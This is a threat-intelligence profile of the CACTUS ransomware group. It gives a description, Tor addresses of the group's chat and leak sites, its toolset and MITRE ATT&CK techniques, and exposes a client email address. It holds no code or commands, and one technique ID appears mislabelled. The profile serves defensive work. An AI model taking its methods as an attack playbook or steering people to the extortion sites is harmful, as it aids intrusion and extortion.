Threat Actor Profile
High
Cybercriminal
Description
The CACTUS ransomware is said to have emerged around March 2023. The group became known for exploiting vulnerabilities to gain initial access and maintain a presence within the organization's infrastructure. There is little known information about the ransomware group, except that it emerged on the mentioned date and, following encryption, a text file named 'cAcTuS.readme.txt' would be created. Additionally, encrypted files were altered to the '.cts1' extension, and data exfiltration and victim extortion were conducted through the use of the service known as Tox. Source: https://github.com/crocodyli/ThreatActors-TTPs
Confidence Score
Tags
ransomware
ransomware.live
First Seen
Unknown
Last Updated
Unknown
Active Status
ActiveCreated
April 29, 2026
MITRE ATT&CK Techniques (20)
Indicators of Compromise
Loading IOCs…
IOC KQL for Sentinel
STIX Data
{'added_date': None,
'client': '2003264@sit.singaporetech.edu.sg',
'description': 'The CACTUS ransomware is said to have emerged around March '
'2023. The group became known for exploiting vulnerabilities '
'to gain initial access and maintain a presence within the '
"organization's infrastructure.<br> <br> There is little known "
'information about the ransomware group, except that it '
'emerged on the mentioned date and, following encryption, a '
"text file named 'cAcTuS.readme.txt' would be created. "
"Additionally, encrypted files were altered to the '.cts1' "
'extension, and data exfiltration and victim extortion were '
'conducted through the use of the service known as '
'Tox.<br>Source: '
'https://github.com/crocodyli/ThreatActors-TTPs',
'firstseen': '2023-07-03T00:00:00+00:00',
'group': 'cactus',
'has_negotiations': False,
'has_ransomnote': True,
'lastseen': '2025-03-17T09:28:12.446000+00:00',
'locations': [{'available': True,
'fqdn': 'sonarmsng5vzwqezlvtu2iiwwdn3dxkhotftikhowpfjuzg7p3ca5eid.onion',
'slug': 'http://sonarmsng5vzwqezlvtu2iiwwdn3dxkhotftikhowpfjuzg7p3ca5eid.onion/contact/Cactus_Support',
'title': 'Sonar - Encrypted communications',
'type': 'Chat'},
{'available': False,
'fqdn': 'cactusbloguuodvqjmnzlwetjlpj6aggc6iocwhuupb47laukux7ckid.onion',
'slug': 'https://cactusbloguuodvqjmnzlwetjlpj6aggc6iocwhuupb47laukux7ckid.onion',
'title': '500: Internal Server Error',
'type': 'DLS'},
{'available': False,
'fqdn': 'cactus5dqnqkppa5ayckiyk6dttpqwczdqphv5mxh4dkk5ct544q5aad.onion',
'slug': 'https://cactus5dqnqkppa5ayckiyk6dttpqwczdqphv5mxh4dkk5ct544q5aad.onion',
'title': '',
'type': 'DLS'}],
'negotiation_count': 0,
'ransomnotes_count': 6,
'tiaras_metadata': {'has_negotiations': False,
'has_ransomnote': True,
'locations': [{'available': True,
'fqdn': 'sonarmsng5vzwqezlvtu2iiwwdn3dxkhotftikhowpfjuzg7p3ca5eid.onion',
'slug': 'http://sonarmsng5vzwqezlvtu2iiwwdn3dxkhotftikhowpfjuzg7p3ca5eid.onion/contact/Cactus_Support',
'title': 'Sonar - Encrypted communications',
'type': 'Chat'},
{'available': False,
'fqdn': 'cactusbloguuodvqjmnzlwetjlpj6aggc6iocwhuupb47laukux7ckid.onion',
'slug': 'https://cactusbloguuodvqjmnzlwetjlpj6aggc6iocwhuupb47laukux7ckid.onion',
'title': '500: Internal Server Error',
'type': 'DLS'},
{'available': False,
'fqdn': 'cactus5dqnqkppa5ayckiyk6dttpqwczdqphv5mxh4dkk5ct544q5aad.onion',
'slug': 'https://cactus5dqnqkppa5ayckiyk6dttpqwczdqphv5mxh4dkk5ct544q5aad.onion',
'title': '',
'type': 'DLS'}],
'negotiation_count': 0,
'ransomnotes_count': 6,
'ransomware_live_group': 'cactus',
'tools': {'CredentialTheft': [],
'DefenseEvasion': [],
'DiscoveryEnum': ['Nmap', 'SoftPerfect NetScan'],
'Exfiltration': ['RClone'],
'LOLBAS': [],
'Networking': ['Chisel'],
'Offsec': ['Cobalt Strike'],
'RMM-Tools': ['AnyDesk',
'Splashtop',
'SuperOps']},
'url': 'https://www.ransomware.live/group/cactus',
'victims': 248,
'vulnerabilities': []},
'tiaras_source': 'ransomware.live',
'tools': {'CredentialTheft': [],
'DefenseEvasion': [],
'DiscoveryEnum': ['Nmap', 'SoftPerfect NetScan'],
'Exfiltration': ['RClone'],
'LOLBAS': [],
'Networking': ['Chisel'],
'Offsec': ['Cobalt Strike'],
'RMM-Tools': ['AnyDesk', 'Splashtop', 'SuperOps']},
'ttps': [{'tactic_id': 'TA0042',
'tactic_name': 'Resource Development',
'techniques': [{'technique_details': 'The threat actor was '
'identified by Microsoft as '
'responsible for the Danabot '
'campaign via malvertising for '
'final delivery of Ransomware '
'Cactus.',
'technique_id': 'T1538.008',
'technique_name': 'Malvertising'}]},
{'tactic_id': 'TA0001',
'tactic_name': 'Initial Access',
'techniques': [{'technique_details': 'The group exploits '
'vulnerabilities in VPN '
'applications.',
'technique_id': 'T1190',
'technique_name': 'Exploit Public-Facing '
'Application'}]},
{'tactic_id': 'TA0002',
'tactic_name': 'Execution',
'techniques': [{'technique_details': 'The group uses task '
'scheduling for file execution '
'for C2 communication and uses '
'ransomware payload '
'persistence.',
'technique_id': 'T1053.005',
'technique_name': 'Scheduled Task/Job: Scheduled '
'Task'},
{'technique_details': 'Actors attempt to gain access '
'and use a set of third-party '
'software installed on the '
'network for lateral movement.',
'technique_id': 'T1072',
'technique_name': 'Software Deployment Tools'}]},
{'tactic_id': 'TA0007',
'tactic_name': 'Discovery',
'techniques': [{'technique_details': 'Actors use tools to scan the '
"organization's infrastructure "
'systems.',
'technique_id': 'T1049',
'technique_name': 'System Network Connections '
'Discovery'},
{'technique_details': 'Actors use scripts to '
'identify domain accounts of '
'connected users through '
'Windows event logs.',
'technique_id': 'T1087.002',
'technique_name': 'Account Discovery: Domain '
'Account'},
{'technique_details': 'Actors attempt to obtain a '
'list of other systems, hosts, '
'IPs, and any other identifier '
'for lateral movement.',
'technique_id': 'T1018',
'technique_name': 'Remote System Discovery'},
{'technique_details': 'Actors attempt to obtain a '
'list of accounts, user names, '
'and valid email addresses for '
'later access.',
'technique_id': 'T1087',
'technique_name': 'Account Discovery'}]},
{'tactic_id': 'TA0011',
'tactic_name': 'Command and Control',
'techniques': [{'technique_details': 'Actors use RDP connection to '
'access other devices on the '
'internal network.',
'technique_id': 'T1219',
'technique_name': 'Remote Access Software'},
{'technique_details': 'Actors use connection proxy '
'to route network traffic '
'between systems to avoid '
'detection by security '
'solutions.',
'technique_id': 'T1090',
'technique_name': 'Proxy'}]},
{'tactic_id': 'TA0005',
'tactic_name': 'Defense Evasion',
'techniques': [{'technique_details': 'The group uses modification '
'and disabling of security '
'tools to avoid possible '
'malware and access detection.',
'technique_id': 'T1562.001',
'technique_name': 'Disable or Modify Tools'},
{'technique_details': 'The group uses file '
'obfuscation techniques to '
'avoid detection by defenses.',
'technique_id': 'T1027',
'technique_name': 'Obfuscated Files or Information'},
{'technique_details': 'Actors use packing in '
'ransomware payload to avoid '
'detection by defenses.',
'technique_id': 'T1027.002',
'technique_name': 'Obfuscated Files or Information: '
'Software Packing'}]},
{'tactic_id': 'TA0003',
'tactic_name': 'Persistence',
'techniques': [{'technique_details': 'The group creates a '
'service/system account to '
'launch the ransomware.',
'technique_id': 'T1136',
'technique_name': 'Create Account'}]},
{'tactic_id': 'TA0006',
'tactic_name': 'Credential Access',
'techniques': [{'technique_details': 'The group searches for key '
"files from users' browsers to "
'locate stored passwords to '
'proceed with the attack and '
'access other accounts.',
'technique_id': 'T1555.003',
'technique_name': 'Credentials from Web Browsers'},
{'technique_details': 'The group performs LSASS '
'memory dump to identify '
'credentials.',
'technique_id': 'T1003.001',
'technique_name': 'OS Credential Dumping'}]},
{'tactic_id': 'TA0008',
'tactic_name': 'Lateral Movement',
'techniques': [{'technique_details': 'The group uses initial access '
'to set up an SSH tunnel to '
'C2.',
'technique_id': 'T1021.004',
'technique_name': 'Remote Services: SSH'},
{'technique_details': 'Cactus actors use valid '
'accounts to log into devices '
'via RDP.',
'technique_id': 'T1021.001',
'technique_name': 'Remote Desktop Protocol'},
{'technique_details': 'Actors use tools or other '
'files between systems to '
'prepare files and encrypt '
'data.',
'technique_id': 'T1570',
'technique_name': 'Lateral Tool Transfer'}]},
{'tactic_id': 'TA0010',
'tactic_name': 'Exfiltration',
'techniques': [{'technique_details': 'Actors exfiltrate data to a '
'cloud storage service through '
'tools such as Rclone and '
'others.',
'technique_id': 'T1567.002',
'technique_name': 'Exfiltration to Cloud Storage'}]},
{'tactic_id': 'TA0040',
'tactic_name': 'Impact',
'techniques': [{'technique_details': 'Actors use ransomware payload '
'to encrypt data and change '
'extensions.',
'technique_id': 'T1486',
'technique_name': 'Data Encrypted for Impact'}]}],
'url': 'https://www.ransomware.live/group/cactus',
'victims': 248,
'vulnerabilities': []}